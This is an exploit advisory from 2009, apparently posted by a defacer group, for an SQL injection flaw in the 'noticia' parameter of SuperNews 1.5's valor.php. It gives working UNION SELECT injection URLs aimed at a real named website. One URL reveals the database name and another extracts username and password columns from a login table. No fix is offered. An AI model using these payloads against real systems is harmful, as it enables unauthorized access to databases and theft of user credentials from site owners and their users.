SuperNews 1.5 (valor.php noticia) SQL Injection Vulnerability

2009-03-23 16:42:51

#############################################################
SuperNews 1.5 SQL Injection in valor.php
#############################################################


###################################################
#[~] Author : p3s0k!
#[~] Terminal Hacker Team
###################################################

Example:
http://www.avhsj.com.br/noticias/valor.php?noticia=[SQL-Injection]


LiveDEMO:

http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,database(),4,5--
http://www.avhsj.com.br/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--



##############################
#[!] Terminal Hacker Defacers
#[!] www.TerminalHacker.es
##############################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.